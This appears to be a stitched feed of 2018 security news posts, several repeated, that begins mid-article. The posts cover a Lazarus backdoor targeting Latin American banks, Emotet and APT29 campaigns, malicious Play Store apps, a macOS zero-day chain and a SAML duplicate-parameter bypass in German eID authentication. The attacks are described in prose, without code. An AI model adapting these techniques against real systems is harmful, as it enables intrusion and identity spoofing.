Experts noticed that the loader DLL is installed as a service, it uses different names on different machines. The backdoor implements several capabilities, it can collect files and system information, download files and additional malware, launch/terminate/enumerate processes, update configuration data, delete files; inject code from files to other running process, utilize proxy, open reverse shell, and run in passive mode, where it opens and listens to a port to receive commands through it.

C&C information is contained in the encrypted configuration file, the backdoor requires a C&C connection for conducting activities.

“The Lazarus group is an experienced organization, methodically evolving their tools and experimenting with strategies to get past an organization’s defenses. The backdoors they are deploying are difficult to detect and a significant threat to the privacy and security of enterprises, allowing attackers to steal information, delete files, install malware, and more,” Trend Micro concludes.

Pierluigi Paganini

(Security Affairs – Hacking, Lazarus)

The post North Korea-linked group Lazarus targets Latin American banks appeared first on Security Affairs.



Security Affairs

North Korea-linked group Lazarus targets Latin American banks

According to security reearchers at Trend Micro, the North Korea-linked APT group Lazarus recently targeted banks in Latin America.

The North Korea-linked APT group Lazarus recently targeted banks in Latin America, Trend Micro experts reported.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFTattacks in 2016, and the Sony Pictures hack.

Recently, the group was involved in several attacks aimed at stealing millions from ATMs across Asia and Africa.

Security experts from Symantec have recently discovered a malware, tracked as FastCash Trojan, that was used by the Lazarus APT Group, in a string of attacks against ATMs.

The ATP group has been using this malware at least since 2016 to siphon millions of dollars from ATMs of small and midsize banks in Asia and Africa.

Now experts from Trend Micro have found a Lazarus backdoor on several machines belonging to financial institutions across Latin America. The malicious codes were installed by the APT group on the targeted machines on September 19.

“There seems to be a resurgence of activity from the group, and recent events show how their tools and techniques have evolved. Just last week they were found stealing millions from ATMs across Asia and Africa.” reads the analysis published by Trend Micro.

“We also recently discovered that they successfully planted their backdoor (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) into several machines of financial institutions across Latin America.”

The technique recently used by Lazarus resembles a 2017 wave of attacks that hit targets in Asia, at the time hackers used the FileTokenBroker.dll and a modularized backdoor.

In 2018 attacks, the Lazarus group used multiple backdoors, and also implemented a sophisticated technique that involves the three major components:

  • AuditCred.dll/ROptimizer.dll (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) – loader DLL that is launched as a service
  • Msadoz<n>.dll (detected by Trend Micro as BKDR64_BINLODR.ZNFJ-A) – encrypted backdoor
    n = number of characters in the loader dll’s filename
  • Auditcred.dll.mui/rOptimizer.dll.mui (detected by Trend Micro as TROJ_BINLODRCONF.ZNFJ-A) – encrypted configuration file

Lazarus Latin america attacks

Experts noticed that the loader DLL is installed as a service, it uses different names on different machines. The backdoor implements several capabilities, it can collect files and system information, download files and additional malware, launch/terminate/enumerate processes, update configuration data, delete files; inject code from files to other running process, utilize proxy, open reverse shell, and run in passive mode, where it opens and listens to a port to receive commands through it.

C&C information is contained in the encrypted configuration file, the backdoor requires a C&C connection for conducting activities.

“The Lazarus group is an experienced organization, methodically evolving their tools and experimenting with strategies to get past an organization’s defenses. The backdoors they are deploying are difficult to detect and a significant threat to the privacy and security of enterprises, allowing attackers to steal information, delete files, install malware, and more,” Trend Micro concludes.

Pierluigi Paganini

(Security Affairs – Hacking, Lazarus)

The post North Korea-linked group Lazarus targets Latin American banks appeared first on Security Affairs.

Security Affairs: US Government is asking allies to ban Huawei equipment

US Government is inviting its allies to exclude Huawei equipment from critical infrastructure and 5G architectures, reports the Wall Street Journal

The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy an, Japan.

Many countries are going to build 5G infrastructure, but the approach of their governments is completely different. Italian politicians seem to completely ignore the importance of 5G infrastructure for the growth of the country and the potential effects on national security, while senior German officials are planning to exclude Chinese firms such as Huawei from the tender because worried of potential compromise of national security.

Huawei

According to the Wall Street Journal, the US government is planning to offer financial aid for telecoms development in countries that don’t using the Chinese-made equipment.

Germany is not the first country to ban Chinese firms from the 5G auction, Australia and the US already announced the same decision.

Huawei always denied links to the Chinese intelligence services.

US officials are concerned for the use of Chinese telecom equipment in countries with US military bases, including Germany, Italy, and Japan.

Pierluigi Paganini

(Security Affairs – intelligence, cyber espionage)

The post US Government is asking allies to ban Huawei equipment appeared first on Security Affairs.



Security Affairs

US Government is asking allies to ban Huawei equipment

US Government is inviting its allies to exclude Huawei equipment from critical infrastructure and 5G architectures, reports the Wall Street Journal

The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy an, Japan.

Many countries are going to build 5G infrastructure, but the approach of their governments is completely different. Italian politicians seem to completely ignore the importance of 5G infrastructure for the growth of the country and the potential effects on national security, while senior German officials are planning to exclude Chinese firms such as Huawei from the tender because worried of potential compromise of national security.

Huawei

According to the Wall Street Journal, the US government is planning to offer financial aid for telecoms development in countries that don’t using the Chinese-made equipment.

Germany is not the first country to ban Chinese firms from the 5G auction, Australia and the US already announced the same decision.

Huawei always denied links to the Chinese intelligence services.

US officials are concerned for the use of Chinese telecom equipment in countries with US military bases, including Germany, Italy, and Japan.

Pierluigi Paganini

(Security Affairs – intelligence, cyber espionage)

The post US Government is asking allies to ban Huawei equipment appeared first on Security Affairs.

Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud

Group-IB security experts are warning about the increasing scammers’ activity during the Black Friday and Cyber Monday Sales

Group-IB, an international company that specializes in preventing cyber attacks, warns about the increasing scammers’ activity during the Black Friday and Cyber Monday Sales. Group-IB experts have discovered more than 400 website-clones of the popular marketplace AliExpress and roughly 200 fake websites of famous brands and online stores. These websites aim to sell counterfeit products, steal money or credit cards information.

Black Friday counterfeit goods

Fake leather bags, sunglasses, sportswear, electronics and perfumes pose risks to consumers. Long Beach press conference. Photo by Brad Graverson 11-28-14

AliExpress and its 400 clones             

The Black Friday Sale – is a favorite time of the year for not only bargain hunters chasing the best deals, but also for online scammers chasing a quick buck. They create website-clones of famous brands and online stores long before the Black Friday starts. For instance, Group-IB discovered around 400 bogus AliExpress websites that appear to be legitimate. To attract customers fraudsters create fake websites that look almost identical to the legitimate ones: they copy branding, logo, fonts and even register a similar domain name to mislead the visitors. Most of the analyzed fraudulent websites had many variations of AliExpress legitimate URL. The damage to one customer can reach up to hundreds of dollars. Such fake websites are capable of luring up to 200 000 monthly visitors.

Just one group of scammers is capable of creating hundreds of bogus websites. Not long before the Black Friday Sale Group-IB Brand Protection team detected a network of 198 fake websites that illegally used famous brands’ trademarks. Most of the domain names were purchased in August 2018, and all the content – photos, product descriptions, and prices – was copied from the legitimate website. It is worth noting that all these fake websites had the same hosting provider — ISPIRIA Networks Ltd, located in Belize (Central America). Scammers create fake websites to advertise and sell counterfeit goods, such as computers and electronics, clothing, jewelry, accessories, beauty and personal care products and even medicine usually with discounts that reach 80%.  Sometimes fraudsters advertise and sell non-existent products. For example, one of the fake websites offers to buy «Red Dead Redemption 2» for PC, while the most anticipated game of 2018 was only released for PlayStation 4 and Xbox One.

Phishing: 1274 attacks a day          

Another type of fraud that pose a serious threat to customers is phishing websites that are looking to steal money or personal information (login credentials or credit card details). According to Group-IB Brand Protection experts, 1274 phishing attacks are carried out daily. In total the average monthly revenue of phishing websites, designed to closely resemble the legitimate brands’ trademarks, is amounted to 45,600 USD.

Fraudsters use legitimate promotion channels to increase their website traffic: mass mailing via messengers, banner ads, SEO and paid social media campaigns. Fraudsters quite often buy domain names that mimic the legitimate brands’ websites addresses and then redirect users to different webpages. If you click on such link, you end up on a completely different website.

“The consequences of such fraud can be both direct financial losses and collateral, such as damage to the reputation. According to statistics, 64% of users stop buying a company’s products after one negative experience. In the cybersecurity framework, the websites-clones should be considered not only as a threat to the customers, but also to the company. Detecting fraudulent websites should be a systemic activity for big brands,” – comments Andrey Busargin, Director of Brand Protection and Anti-Piracy at Group-IB.

How to avoid online scammers: protect your brand & secure your wallet

Group-IB’s experts remind about basic “cyber hygiene” not to become a cyber criminals’ victim:

For brands:

1.       Purchase all similar domain names so that cyber criminals could not use your trademark in the fake website’s domain name. For example, if your address is internet-shop.ru, cybercriminals can register the following domain names: internet.shop.ru or internet shop.ru and act on behalf of your brand.

2.       Monitor references to your brand in the domain names and phishing websites databases regularly. Companies that provide brand protection and anti-fraud services on the Internet have access to these databases.

3.       Look for the criminals who use your brand in search engines. Search requests should be sent from different geo locations and devices in order to have most objective search output.

4.       Keep track of the promotion techniques of fraudulent resources: context ads, posts in social networks and messengers.

5.       Discover the network of fraudulent websites that use your brand. Usually, cyber criminals create several website clones. They can be detected using the websites affiliation technologies that automatically detect the links between fraudulent resources.

6.       Monitor mobile apps both in the official and unofficial stores, including forums, search engines, social networks and websites where they get distributed.

7.       Constantly monitor the use of your brand and company management names in social media.

8.       Block fraudulent resources that cause reputational and financial damage to your brand. Seek out the experts.

For customers:

1.       First, always pay attention to the URL in the browser.
2.       If the website name contains a few dots, for example (*con.su.club), it is better not to order anything from such website. Check an official site via web search.
3.       Check the date of when the website was created. In order to do this use free WHOIS-services where you can find the registration date and information on the owner of the domain (fraudulent websites are newly created, usually days before the big sales).
4.       Do not trust malfunctioning websites, the official website should work correctly even at peak load.
5.       Do not purchase from unauthorized resellers.
6.       Do not click on the links in articles dedicated to discounts.
7.       Have a separate payment card for online shopping and do not type in your card data on suspicious websites. At the end of the day, it is better not to buy a product rather than lose all the money from your bank card.

About the Author: Group-IB Corporate Communications 

http://www.group-ib.ru

https://www.group-ib.ru/blog/

telegram | facebook | twitter | linkedin

Pierluigi Paganini

(Security Affairs – Black Friday, Cybercrime)

The post Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud appeared first on Security Affairs.

VMware fixed Workstation flaw disclosed at the Tianfu Cup PWN competition

VMware released security updates to address a vulnerability (CVE-2018-6983) that was recently discovered at the Tianfu Cup PWN competition.

VMware released security updates to address a vulnerability (CVE-2018-6983) that was recently discovered by Tianwen Tang of Qihoo 360’s Vulcan Team at the Tianfu Cup PWN competition.

White hat hackers earned more than $1 million for zero-day exploits disclosed at the hacking contest that took place on November 16-17 in Chengdu.

Tang received $100,000 for the successful exploitation of the flaw, the virtualization giant has quickly fixed the critical Workstation and Fusion vulnerability.

“VMware Workstation and Fusion contain an integer overflow vulnerability in the virtual network devices. This issue may allow a guest to execute code on the host.” states the security advisory published by VMWare.

“VMware would like to thank Tianwen Tang of Qihoo 360Vulcan Team  working with the Tianfu Cup 2018 International Pwn Contest for reporting this issue to us.”

The flaw is an integer overflow bug affecting virtual network devices, it could be exploited to execute code on the Workstation host from the guest.

The flaw affects Workstation 14.x and 15.x on any platform, and Fusion 10.x and 11.x on macOS.

“We wanted to post a quick acknowledgement that VMware has representatives in attendance at the Tianfu Cup PWN Contest in Chengdu, China to review any vulnerabilities that may be demonstrated during the contest.added VMWware.

“We would like to thank the organisers for inviting us to attend. Stay tuned for further updates.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post VMware fixed Workstation flaw disclosed at the Tianfu Cup PWN competition appeared first on Security Affairs.

Security Affairs: VMware fixed Workstation flaw disclosed at the Tianfu Cup PWN competition

VMware released security updates to address a vulnerability (CVE-2018-6983) that was recently discovered at the Tianfu Cup PWN competition.

VMware released security updates to address a vulnerability (CVE-2018-6983) that was recently discovered by Tianwen Tang of Qihoo 360’s Vulcan Team at the Tianfu Cup PWN competition.

White hat hackers earned more than $1 million for zero-day exploits disclosed at the hacking contest that took place on November 16-17 in Chengdu.

Tang received $100,000 for the successful exploitation of the flaw, the virtualization giant has quickly fixed the critical Workstation and Fusion vulnerability.

“VMware Workstation and Fusion contain an integer overflow vulnerability in the virtual network devices. This issue may allow a guest to execute code on the host.” states the security advisory published by VMWare.

“VMware would like to thank Tianwen Tang of Qihoo 360Vulcan Team  working with the Tianfu Cup 2018 International Pwn Contest for reporting this issue to us.”

The flaw is an integer overflow bug affecting virtual network devices, it could be exploited to execute code on the Workstation host from the guest.

The flaw affects Workstation 14.x and 15.x on any platform, and Fusion 10.x and 11.x on macOS.

“We wanted to post a quick acknowledgement that VMware has representatives in attendance at the Tianfu Cup PWN Contest in Chengdu, China to review any vulnerabilities that may be demonstrated during the contest.added VMWware.

“We would like to thank the organisers for inviting us to attend. Stay tuned for further updates.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post VMware fixed Workstation flaw disclosed at the Tianfu Cup PWN competition appeared first on Security Affairs.



Security Affairs

New Emotet Thanksgiving campaign differs from previous ones

Researchers from Forcepoint observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

Security researchers from Forcepoint have observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

EMOTET, aka Geodo, is a banking trojan linked to the dreaded Dridex and Feodo (CridexBugat)  malware families.

In past campaigns, EMOTET was used by crooks to steal banking credentials and as a malicious payload downloader.

According to the experts, the Thanksgiving-themed campaign targeted U.S. users this week.

“After a hiatus of some weeks, we observed Emotet returning in mid-November with upgraded macro obfuscation and formatting.  On 19 November, it began a US-centric Thanksgiving-themed campaign. As many will know this is a departure from the standard financial themes regularly seen.” reads the analysis published by Forcepoint.

The new campaign leverages an improved variant of the malware that implements new features and modules, experts pointed out that this is the first campaign that doesn’t use financial themes.

The crooks behind the recent Emotet campaign sent out roughly 27,000 messages daily, below a sample of the Thanksgiving-themed message:

Emotet

The attachment is an XML file masquerading as a .doc with embedded macros leading to a standard PowerShell downloader normally observed with Emotet banking Trojan, which is also used by crooks to drop other payloads.

“However, the document in this case is not the usual .doc or .docx but rather an XML file masquerading as a .doc, and the macro in this instance makes use of the Shapes feature, ultimately leading to the calling of the shell function using a WindowStyle of vbHide.” continues the expert.

The macro has been recently evolved from the Emotet pattern, in implements upgraded macro obfuscation and formatting.

“In the few weeks since Emotet returned it has undergone some interesting changes, most notably in the new Thanksgiving theme and macro obfuscation discussed previously.” concludes Forcepoint.

“Whilst not completely novel (use of XML files to conceal macros was reported by Trustwave back in 2015) it does pose a challenge to defenders due to the sheer volume of emails sent, as detection signatures need to be rapidly created to stem the onrushing tide.”

Further details, including IoCs are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – banking trojan, spam)

 

The post New Emotet Thanksgiving campaign differs from previous ones appeared first on Security Affairs.

Exclusive Cybaze ZLab – Yoroi – Hunting Cozy Bear, new campaign, old habits

The experts at Cybaze ZLab – Yoroi continue the analysis of new strain of malware used by the Russia-linked APT29 cyberespionage group (aka Cozy Bear)

The experts at Cybaze ZLab – Yoroi continue the analysis of new strain of malware used by the Russia-linked APT29 cyberespionage group (aka The DukesCozy Bear, and Cozy Duke).

The researchers of Yoroi ZLab, on 16 November, accessed to a new APT29’s dangerous malware which seems to be involved in the recent wave of attacks aimed at many important US entities, such as military agencies, law enforcement, defense contractors, media companies and pharmaceutical companies.

Threat actors carried out spear phishing attacks impersonating a State Department official to attempt compromising targets

The experts discovered that Cozy Bear cyberspies used in the last campaign a technique to drop malicious code that was already employed by threat actors.

APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.

The same technique has been used by the APT group back in 2016 when the Cozy Bear in the aftermath of the US Presidential Election.

At the time, Cozy Bear hackers carried out spear-phishing attack using a zip file containing a weaponized self-extracting link file that drops a decoy document and the final payload.

Cozy Bear attack 2.png

The researchers at Cybaze ZLab – Yoroi pointed out that the technique used to avoid detection is very sophisticated.

“The usage of a link file containing the complete payload is a powerful technique, still hard to detect by several common anti-virus solutions. Despite the effectiveness of this strategy, the creation of the weaponized LINK such the one analyzed is quite easy,  many publicly available resources could help crooks to abuse it.” reads the analysis published by Cybaze ZLab – Yoroi researchers.

The C2C “pandorasong[.]com” recalls the legit “pandora.com” domain name, one of the most popular music streaming service in the US. Moreover, the requests sent by the malware are forged to look like as legit Pandora traffic, using information publicly available on GitHub.

According to FireEye’s report the final DLL contains a beaconing payload generated with Cobalt Strike, a well-known post-exploitation framework typically used by Red-Teams.

The complete analysis conducted by Cybaze ZLab – Yoroi, including the Yara rules, are reported in a blog post on the Yoroi blog.

New “Cozy Bear” campaign, old habits

Pierluigi Paganini

(Security Affairs – Cozy Bear APT, cyberespionage)

The post Exclusive Cybaze ZLab – Yoroi – Hunting Cozy Bear, new campaign, old habits appeared first on Security Affairs.

Security Affairs: 13 fraudulent apps into Google Play have been downloaded 560,000+ times

Malware researcher discovered 13 fraudulent apps into Google Play that have been already downloaded and installed more than 560,000 times.

Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps into Google Play that have been already downloaded and installed over half a million times (+560,000).

Google Play Malicious apps

The malicious apps could allow attackers to install another app and trick the user into giving the permissions necessary for the installation.

All the malicious apps are posing as games were published by the same developer named Luis O Pinto, at the time they have a low detection rate.

The cybercriminals aim to monetize their efforts pushing unsolicited advertisements to the user when they unlock the device.

Once installed, the malicious apps would remove their icon from the display immediately and downloads other malicious apps in the background.

The applications were all downloaded from a hardcoded address.

In order to trick users into giving permissions to install the downloaded app, the malicious apps attempt to make the user believe that the installation failed and restarted, asking users to approve the action again.

Stefanko reported that the downloaded APK was Game Center, once installed and executed it hides itself start displaying ads.

The expert pointed out that the Game Center requests permissions for full network access and to view network and Wi-Fi connections, and to run at startup.

The malicious apps do not implement specific features, they only work as simple downloaders that can bypass Google Play security checks.

Stefanko confirmed that Game Center is no longer available at the link that is hardcoded in the malicious apps, after being informed of the fraudulent applications Google removed them from Google Play.

Pierluigi Paganini

(Security Affairs – Google Play, malicious apps)

The post 13 fraudulent apps into Google Play have been downloaded 560,000+ times appeared first on Security Affairs.



Security Affairs

13 fraudulent apps into Google Play have been downloaded 560,000+ times

Malware researcher discovered 13 fraudulent apps into Google Play that have been already downloaded and installed more than 560,000 times.

Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps into Google Play that have been already downloaded and installed over half a million times (+560,000).

Google Play Malicious apps

The malicious apps could allow attackers to install another app and trick the user into giving the permissions necessary for the installation.

All the malicious apps are posing as games were published by the same developer named Luis O Pinto, at the time they have a low detection rate.

The cybercriminals aim to monetize their efforts pushing unsolicited advertisements to the user when they unlock the device.

Once installed, the malicious apps would remove their icon from the display immediately and downloads other malicious apps in the background.

The applications were all downloaded from a hardcoded address.

In order to trick users into giving permissions to install the downloaded app, the malicious apps attempt to make the user believe that the installation failed and restarted, asking users to approve the action again.

Stefanko reported that the downloaded APK was Game Center, once installed and executed it hides itself start displaying ads.

The expert pointed out that the Game Center requests permissions for full network access and to view network and Wi-Fi connections, and to run at startup.

The malicious apps do not implement specific features, they only work as simple downloaders that can bypass Google Play security checks.

Stefanko confirmed that Game Center is no longer available at the link that is hardcoded in the malicious apps, after being informed of the fraudulent applications Google removed them from Google Play.

Pierluigi Paganini

(Security Affairs – Google Play, malicious apps)

The post 13 fraudulent apps into Google Play have been downloaded 560,000+ times appeared first on Security Affairs.

Software company OSIsoft has suffered a data breach

Software company OSIsoft has suffered a data breach, the firm confirmed that all domain accounts have likely been compromised.

Software company OSIsoft notified security breach to employees, interns, consultants, and contractors.

The company offers real-time data management solutions, its core product is the open enterprise infrastructure, the PI System, that allows connecting sensor-based data, systems, and people.

The PI System product is used by organizations to collect, analyze and visualize data to improve internal processes.

According to the data breach notification published by the company and submitted to the Office of the Attorney General in California, attackers used stolen credentials to remotely access company systems.

“OSIsoft is experiencing a security incident that may affect employees, interns, consultants and contractors. Stolen credentials were used to remotely access OSIsoft computers.” reads the data breach notification.

“OSIsoft intrusion detection systems alerted IT to unauthorized activity. Our security service provider has recovered direct evidence of credential theft activity involving 29 computers and 135 accounts. We have concluded, however, that all OSI domain accounts are affected.”

OSIsoft

Hackers accessed OSI domain logon account name, email address, and password, although Active Directory (AD) uses cryptographic protection methods, users personal credentials may have been compromised.

The company is still investigating the security breach, in the meantime, it has developed a comprehensive remediation strategy.

The submission of the notification to the Office of the Attorney General revealed that at the time OSIsoft listed eight different dates between March 23, 2017, and July 26, 2018, more than a year! Below the data provided by the company.

  • Thursday, March 23, 2017
  • Saturday, May 6, 2017
  • Tuesday, May 9, 2017
  • Saturday, August 5, 2017
  • Wednesday, April 18, 2018
  • Wednesday, May 23, 2018
  • Wednesday, July 18, 2018
  • Thursday, July 26, 2018

The company is resetting compromised passwords, it also urges affected people to change passwords on external services if they were the used for the OSI account, report suspicious activity to the IT team, and disable or restrict remote access and file sharing features on their devices.

Pierluigi Paganini

(Security Affairs – OSIsoft, data breach)

The post Software company OSIsoft has suffered a data breach appeared first on Security Affairs.

Chaining 3 zero-days allowed pen testers to hack Apple macOS computers

Dropbox team disclosed three critical zero-day vulnerabilities in Apple macOS, chaining them it is possible to take over a Mac computer.

Dropbox team disclosed three critical zero-day vulnerabilities (CVE-2017-13890, CVE-2018-4176, CVE-2018-4175) affecting the Apple macOS operating system, an attacker could chain them to remotely execute arbitrary code on a targeted Mac computer.

The attacker only needs to trick victims into visiting a specially crafted website.

The vulnerabilities were discovered by experts at cybersecurity firm Syndis that was hired by Dropbox to carry out a penetration test on the company’s IT infrastructure,

The experts also assessed the Apple software used by Dropbox

The flaws were reported to Apple security team in February and Apple quickly addressed it with the release of March security updates.

The vulnerabilities affected all systems running the latest version of the Safari web browser and operating system.

The CVE-2017-13890 vulnerability was affecting the CoreTypes component of macOS, by processing a maliciously crafted webpage may result in the automatic mounting of a disk image.

The CVE-2018-4176 flaw tied the way Disk Images handled .bundle files, mounting a malicious disk image may result in the launching of an application.

The last vulnerability tracked as CVE-2018-4175 could be exploited to bypass the macOS Gatekeeper security feature using a maliciously crafted application.

The issue allowed to bypass code signing enforcement and execute a modified version of Terminal app leading to arbitrary commands execution.

The experts were able to chain the vulnerabilities to take over a Mac system by tricking a victim into visiting a malicious web page with Safari.

“Syndis was able to chain these together in a two-stage exploit to achieve arbitrary code execution for a user who visits a specially crafted web page with Safari.” reads a blog post published by DropBox.

“The first stage includes a modified version of the Terminal app, which is registered as a handler for a new file extension (.workingpoc). In addition it would contain a blank folder called “test.bundle” which would be set as the default “openfolder” which automatically would open /Applications/Terminal.app without prompt. The second stage includes an unsigned shellscript with the extension “.workingpoc” which is then executed within the running Terminal application without prompt.

Below a video PoC published by DropBox:


Pierluigi Paganini

(Security Affairs – macOS, hacking)

The post Chaining 3 zero-days allowed pen testers to hack Apple macOS computers appeared first on Security Affairs.

Security Affairs: Flaw allowing identity spoofing affects authentication based on German eID cards

The authentication process via German eID cards with RFID chips is flawed, an attacker could impersonate any other citizen.

The nightmare comes true, the authentication process via German eID cards with RFID chips is flawed and a flaw could allow an attacker to allow identity spoofing and changing the date of birth.

The situation is very serious, the new cards are accepted as an ID document in most countries in Europe and allow the German citizens to access online government services (i.e. tax service).

The German ID cards issued since November 1st, 2010, store holder’s information (i.e. name, date of birth, a biometric picture, and optionally fingerprints) in the embedded radio frequency identification (RFID) chip.

The cards could be used to authenticate the holder via the RFID chip, in this scenario, it is possible to use an eID application (i.e. AusweisApp) along with an RFI smartcard reader.

The mutual authentication leverages a PKI infrastructure, the authentication process starts with the web application sending a request to the eID client that initiates all further steps needed for the authentication, and requests it a PIN.

The web application communicates with an authentication server (eID-Server or SAML-Processor) providing it the data contained in the RFID chip (i.e. the name or date of birth of the citizen).

German eID cards

To prevent eavesdropping, the response is digitally signed by the authentication server.

Security researchers at SEC Consult Vulnerability Lab demonstrated that is possible to spoof the identity of a German eID card holder and alter data.

The security expert Wolfgang Ettlinger at SEC Consult Vulnerability Lab discovered a flaw in the Governikus Autent SDK that could be used by companies to implement the ID card authentication to a web service via German eID cards.

The expert devised a method to alter the digitally signed response from the server making it still valid for the client, it was able to authenticate with an arbitrary name (he used the name of the popular writer Johann Wolfgang von Goethe and his address) against a demo version of the AusweisApp eID client.

The expert discovered that Governikus Autent SDK verifies the signature doesn’t implement the management of a parameter with same name occurring multiple times. This implies that the parameter is validated just one time, other instances are parsed as if they already passed verification.

“The vulnerability abuses the fact that HTTP allows multiple parameters having the same name. When the method HttpRedirectUtils.checkQueryString creates a canonical version of the query string, it parses the parameters from it and generates a new query string with the parameters placed in a specific order. The case that a parameter can occur multiple times, is not considered.” reads the analysis published by the expert.

“If an attacker supplies multiple parameters named SAMLResponse, the signature is verified against the last occurrence of the parameter, while the SAML response that is processed further, will be taken from the first occurrence.”

All the attacker needs is a query string signed by the authentication server, no matter how long it is valid because the expiration check is conducted on the manipulated data. According to the expert, this information could be easily obtained using a Google search for eID client logs.

Ettlinger published a video PoC of the attack:

The vulnerability affects Web applications running Autent SDK 3.8.1 and earlier that handle duplicate HTTP parameters.

SEC Consult privately reported technical details of the issues to CERT-Bund in July and Governikus released the version 3.8.1.2 its SDK to fix the flaw.

Experts pointed out that the attack works only partially for services that require an initial registration.

“The id card authentication specification includes the concept of pseudonyms. A pseudonym is a random-looking string generated by the id card. For each web application, the id card generates a different pseudonym. When the user creates an account, the pseudonym is stored by the web application. During login, the web application only requires to request the pseudonym string from the id card and compare it with the values stored in its user database.” conclude the experts.

“As another user’s pseudonym is not easily guessable, an attacker cannot login as another user. The account creation step, however, is still affected by this vulnerability as the attacker could simply generate a random pseudonym. Moreover, this attack is only applicable to web applications that use the method HttpServletRequest.getParameter.”

Pierluigi Paganini

(Security Affairs – German eID cards, hacking)

The post Flaw allowing identity spoofing affects authentication based on German eID cards appeared first on Security Affairs.



Security Affairs

Flaw allowing identity spoofing affects authentication based on German eID cards

The authentication process via German eID cards with RFID chips is flawed, an attacker could impersonate any other citizen.

The nightmare comes true, the authentication process via German eID cards with RFID chips is flawed and a flaw could allow an attacker to allow identity spoofing and changing the date of birth.

The situation is very serious, the new cards are accepted as an ID document in most countries in Europe and allow the German citizens to access online government services (i.e. tax service).

The German ID cards issued since November 1st, 2010, store holder’s information (i.e. name, date of birth, a biometric picture, and optionally fingerprints) in the embedded radio frequency identification (RFID) chip.

The cards could be used to authenticate the holder via the RFID chip, in this scenario, it is possible to use an eID application (i.e. AusweisApp) along with an RFI smartcard reader.

The mutual authentication leverages a PKI infrastructure, the authentication process starts with the web application sending a request to the eID client that initiates all further steps needed for the authentication, and requests it a PIN.

The web application communicates with an authentication server (eID-Server or SAML-Processor) providing it the data contained in the RFID chip (i.e. the name or date of birth of the citizen).

German eID cards

To prevent eavesdropping, the response is digitally signed by the authentication server.

Security researchers at SEC Consult Vulnerability Lab demonstrated that is possible to spoof the identity of a German eID card holder and alter data.

The security expert Wolfgang Ettlinger at SEC Consult Vulnerability Lab discovered a flaw in the Governikus Autent SDK that could be used by companies to implement the ID card authentication to a web service via German eID cards.

The expert devised a method to alter the digitally signed response from the server making it still valid for the client, it was able to authenticate with an arbitrary name (he used the name of the popular writer Johann Wolfgang von Goethe and his address) against a demo version of the AusweisApp eID client.

The expert discovered that Governikus Autent SDK verifies the signature doesn’t implement the management of a parameter with same name occurring multiple times. This implies that the parameter is validated just one time, other instances are parsed as if they already passed verification.

“The vulnerability abuses the fact that HTTP allows multiple parameters having the same name. When the method HttpRedirectUtils.checkQueryString creates a canonical version of the query string, it parses the parameters from it and generates a new query string with the parameters placed in a specific order. The case that a parameter can occur multiple times, is not considered.” reads the analysis published by the expert.

“If an attacker supplies multiple parameters named SAMLResponse, the signature is verified against the last occurrence of the parameter, while the SAML response that is processed further, will be taken from the first occurrence.”

All the attacker needs is a query string signed by the authentication server, no matter how long it is valid because the expiration check is conducted on the manipulated data. According to the expert, this information could be easily obtained using a Google search for eID client logs.

Ettlinger published a video PoC of the attack:

The vulnerability affects Web applications running Autent SDK 3.8.1 and earlier that handle duplicate HTTP parameters.

SEC Consult privately reported technical details of the issues to CERT-Bund in July and Governikus released the version 3.8.1.2 its SDK to fix the flaw.

Experts pointed out that the attack works only partially for services that require an initial registration.

“The id card authentication specification includes the concept of pseudonyms. A pseudonym is a random-looking string generated by the id card. For each web application, the id card generates a different pseudonym. When the user creates an account, the pseudonym is stored by the web application. During login, the web application only requires to request the pseudonym string from the id card and compare it with the values stored in its user database.” conclude the experts.

“As another user’s pseudonym is not easily guessable, an attacker cannot login as another user. The account creation step, however, is still affected by this vulnerability as the attacker could simply generate a random pseudonym. Moreover, this attack is only applicable to web applications that use the method HttpServletRequest.getParameter.”

Pierluigi Paganini

(Security Affairs – German eID cards, hacking)

The post Flaw allowing identity spoofing affects authentication based on German eID cards appeared first on Security Affairs.

Experts found first Mirai bot targeting Linux servers via Hadoop YARN flaw

Security experts from Netscout Asert discovered more than ten Mirai bot variants attempting to exploit a recently disclosed flaw in Hadoop YARN on Intel servers.

These Mirai variants are the first one that doesn’t target Internet of Things devices, the bot was specifically developed to target Linux servers.

The Hadoop YARN is vulnerability is a command injection flaw that could be exploited by attackers to remotely execute arbitrary shell commands on a vulnerable server.

The new versions don’t implement worm-like spreading abilities, instead, threat actors leverage exploits to spread the malware.

Netscout observed tens of thousands of exploit attempts daily targeting it honeypots, in November attackers attempted to deliver some 225 unique malicious payloads exploiting the Hadoop YARN vulnerability.

One of the variants spotted by the experts labeled itself as VPNFilter, even if it is not linked with the infamous VPNFilter bot that infected more than a half-million small and home office routers in May.

“ASERT has been monitoring exploit attempts for the Hadoop YARN vulnerability in our honeypot network and found a familiar, but surprising payload – Mirai. These versions of Mirai behave much like the original but are tailored to run on Linux servers and not underpowered IoT devices.” reads the analysis published by the experts.

“Mirai botmasters that target Linux servers no longer need to tailor their malware for strange architectures, they assume their targets are using x86.”

